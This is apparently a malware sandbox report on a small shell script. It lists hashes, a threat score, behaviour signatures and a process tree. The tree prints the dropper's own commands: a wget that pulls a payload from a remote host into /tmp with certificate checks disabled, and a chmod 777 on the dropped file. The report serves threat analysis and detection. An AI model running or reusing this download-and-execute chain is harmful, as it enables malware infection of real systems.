Analysis

  • max time kernel
    1s
  • max time network
    20s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhf
    image:debian9-armhf-20240611-en
    kernel:4.9.0-13-armmp-lpae
    locale:en-us
    os:debian-9-armhf
    system
  • submitted
    14-11-2024 02:46

General

  • Target

    890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh

  • Size

    538B

  • MD5

    8a16d10e22250a89ce00b7e4eaf40ec7

  • SHA1

    ffdf9336427fe2ac3840a79ee5cad114da82b61d

  • SHA256

    890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa

  • SHA512

    2e8a99c289f94d7eea75e5c7de551d3b4fe406281efd7dddf530b4492d7e58049f781c5ba781838505357a742a8e6bdc1a4620a08df76aaffe9ac7c611968161

Score
7/10

Signatures

  • File and Directory Permissions Modification (1 TTP, 1 IoC)

    Adversaries may modify file or directory permissions to evade defenses.

  • Writes file to tmp directory (2 IoCs)

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
    /tmp/890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
    depth 1, PID:652
      • /usr/bin/dirname
        dirname -- /tmp/890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa.sh
        depth 2, PID:656
      • /bin/mktemp
        mktemp
        depth 2, PID:663
        Signature: Writes file to tmp directory
      • /usr/bin/wget
        wget -O /tmp/tmp.FgjxKrP7S1 https://cryptor.live/crypt/ct872/api/6c32NmxVIhq5PMiRqFtg3YtQapLydYti --header "Host: cryptor.biz" --no-check-certificate --retry-connrefused "--waitretry=1" "--read-timeout=20" "--timeout=15" -t 0
        depth 2, PID:665
        Signature: Writes file to tmp directory
      • /bin/chmod
        chmod 777 /tmp/2.jpg
        depth 2, PID:676
        Signature: File and Directory Permissions Modification

MITRE ATT&CK Enterprise v15